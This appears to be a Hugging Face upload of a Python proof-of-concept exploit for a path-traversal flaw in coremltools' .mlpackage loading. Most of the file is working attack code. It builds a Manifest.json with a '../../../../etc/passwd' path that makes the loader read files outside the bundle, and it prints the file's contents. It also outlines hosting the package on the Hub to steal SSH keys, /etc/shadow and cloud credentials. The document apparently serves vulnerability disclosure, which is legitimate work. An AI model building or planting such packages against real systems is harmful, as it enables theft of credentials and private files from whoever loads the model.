Upload poc_coreml_path_traversal.py with huggingface_hub

Browse files

Files changed (1) hide show

poc_coreml_path_traversal.py +206 -0

poc_coreml_path_traversal.py ADDED Viewed

	@@ -0,0 +1,206 @@

+"""
+PoC: Path Traversal via Manifest.json in Core ML .mlpackage Model Bundles
+==========================================================================
+Vulnerability: The `path` field inside Manifest.json's itemInfoEntries is
+concatenated with the package's Data/ directory using std::filesystem::path
+operator/ (ModelPackage.cpp line 466) with NO sanitization or containment
+check. A relative path containing "../" sequences escapes the package
+directory entirely.
+The validation at line 308 only calls std::filesystem::exists() on the
+resulting joined path -- it verifies the *target* exists but never checks
+that the resolved path is still inside the .mlpackage bundle.
+When coremltools.utils.load_spec() is called on a malicious .mlpackage,
+it calls getRootModel().path(), which returns the traversed path. Then
+load_spec() opens that path with open(specfile, "rb") and reads its
+contents (utils.py line 270-271), achieving arbitrary file read.
+Impact: Any application or pipeline that loads untrusted .mlpackage files
+(e.g., from Hugging Face Hub, user uploads, CI/CD) can be tricked into
+reading arbitrary files from the host filesystem.
+Usage:
+    python poc_coreml_path_traversal.py
+    # Creates ./malicious.mlpackage/ with a crafted Manifest.json
+    # Then demonstrates the path traversal by loading it with coremltools
+"""
+import json
+import os
+import sys
+import shutil
+def create_malicious_mlpackage(output_dir="malicious.mlpackage",
+                                traversal_target="../../../../etc/passwd"):
+    """
+    Create a .mlpackage directory structure with a Manifest.json whose
+    itemInfoEntries contain a path traversal payload.
+    .mlpackage structure:
+        malicious.mlpackage/
+            Manifest.json
+            Data/
+                (empty -- the traversal path points outside)
+    The Manifest.json references a "path" like:
+        "../../../../etc/passwd"
+    which, when joined with <package>/Data/ via operator/, resolves to
+    a location outside the package.
+    """
+    # Clean up any previous run
+    if os.path.exists(output_dir):
+        shutil.rmtree(output_dir)
+    # Create package directory structure
+    os.makedirs(os.path.join(output_dir, "Data"), exist_ok=True)
+    # Build the malicious Manifest.json
+    # The key vulnerability: the "path" field is used unsanitized at
+    # ModelPackage.cpp:308 (validation) and :466 (findItem/getRootModel)
+    #
+    #   auto path = m_packageDataDirPath / itemInfoEntry->getString("path");
+    #
+    # With traversal_target = "../../../../etc/passwd", the resolved path
+    # becomes: <package>/Data/../../../../etc/passwd => /etc/passwd
+    manifest = {
+        "fileFormatVersion": "1.0.0",
+        "rootModelIdentifier": "malicious-item-id",
+        "itemInfoEntries": {
+            "malicious-item-id": {
+                "path": traversal_target,
+                "name": "model.mlmodel",
+                "author": "com.attacker.evil",
+                "description": "Proof of concept path traversal"
+            }
+        }
+    }
+    manifest_path = os.path.join(output_dir, "Manifest.json")
+    with open(manifest_path, "w") as f:
+        json.dump(manifest, f, indent=2)
+    print(f"[+] Created malicious .mlpackage at: {os.path.abspath(output_dir)}")
+    print(f"[+] Manifest.json written with traversal path: {traversal_target}")
+    print(f"[+] Resolved path will be: <package>/Data/{traversal_target}")
+    return os.path.abspath(output_dir)
+def demonstrate_path_leak(package_path):
+    """
+    Show that coremltools resolves the traversed path and attempts to
+    read the file at the attacker-controlled location.
+    """
+    print("\n[*] Attempting to load malicious .mlpackage with coremltools...")
+    print("[*] This demonstrates the path traversal in getRootModel().path()")
+    try:
+        import coremltools
+        from coremltools.libmodelpackage import ModelPackage
+        # This is the core of the vulnerability:
+        # ModelPackage reads Manifest.json, and getRootModel() calls
+        # findItem() which joins m_packageDataDirPath / unsanitized_path
+        pkg = ModelPackage(package_path)
+        root_model = pkg.getRootModel()
+        resolved_path = root_model.path()
+        print(f"[!] getRootModel().path() resolved to: {resolved_path}")
+        # Check if the resolved path escapes the package directory
+        real_resolved = os.path.realpath(resolved_path)
+        real_package = os.path.realpath(package_path)
+        if not real_resolved.startswith(real_package):
+            print(f"[!] PATH TRAVERSAL CONFIRMED!")
+            print(f"    Package dir:  {real_package}")
+            print(f"    Resolved to:  {real_resolved}")
+            print(f"    The path has escaped the package directory.")
+        else:
+            print("[-] Path did not escape (unexpected).")
+        # In a real attack scenario, load_spec() would call:
+        #   open(resolved_path, "rb").read()
+        # reading arbitrary file contents. We demonstrate this:
+        if os.path.exists(resolved_path):
+            print(f"\n[!] File exists at traversed path. Reading first 5 lines:")
+            with open(resolved_path, "r") as f:
+                for i, line in enumerate(f):
+                    if i >= 5:
+                        print("    ...")
+                        break
+                    print(f"    {line.rstrip()}")
+        else:
+            print(f"\n[*] Target file does not exist at: {resolved_path}")
+            print("[*] But the path traversal is still proven by the resolved path.")
+    except ImportError:
+        print("[!] coremltools not installed -- showing static analysis instead.")
+        print("[*] When loaded, the Manifest.json 'path' field flows to:")
+        print("    ModelPackage.cpp:466  ->  m_packageDataDirPath / attacker_path")
+        print("    utils.py:265         ->  getRootModel().path() => opens the file")
+        print("[*] No canonicalization or containment check exists.")
+    except Exception as e:
+        # The validation at line 308 checks exists() on the traversed path.
+        # If /etc/passwd exists, validation passes. If it doesn't, we get
+        # an error but the path resolution is still demonstrably broken.
+        print(f"[!] Exception during load: {e}")
+        print("[*] This may indicate the target file doesn't exist, but")
+        print("    the path traversal logic is still exploitable when the")
+        print("    target file does exist on the victim's system.")
+def demonstrate_huggingface_scenario():
+    """
+    Describe the realistic attack vector via Hugging Face Hub.
+    """
+    print("\n" + "=" * 70)
+    print("ATTACK SCENARIO: Hugging Face Hub")
+    print("=" * 70)
+    print("""
+1. Attacker creates a Hugging Face model repository containing a
+   malicious .mlpackage directory (it's just a directory with JSON).
+2. Victim runs:
+     from huggingface_hub import hf_hub_download
+     model_path = hf_hub_download("attacker/evil-model", ...)
+     # or uses coremltools directly:
+     import coremltools
+     model = coremltools.models.MLModel("downloaded.mlpackage")
+3. coremltools calls load_spec() -> ModelPackage(path).getRootModel().path()
+   which resolves the traversal path and opens the target file.
+4. Attacker exfiltrates sensitive data:
+   - /etc/passwd, /etc/shadow (system info)
+   - ~/.ssh/id_rsa (SSH keys)
+   - ~/.aws/credentials (cloud credentials)
+   - Environment variable files, config files, etc.
+The .mlpackage format is a plain directory, not a compressed archive,
+so Hugging Face's git-based storage will host it without modification.
+""")
+if __name__ == "__main__":
+    print("=" * 70)
+    print("PoC: Core ML .mlpackage Path Traversal via Manifest.json")
+    print("=" * 70)
+    # Create the malicious package targeting /etc/passwd
+    package_path = create_malicious_mlpackage()
+    # Demonstrate the vulnerability
+    demonstrate_path_leak(package_path)
+    # Show the Hugging Face attack scenario
+    demonstrate_huggingface_scenario()
+    # Cleanup note
+    print("\n[*] Malicious .mlpackage left at:", package_path)
+    print("[*] Run: rm -rf malicious.mlpackage  to clean up.")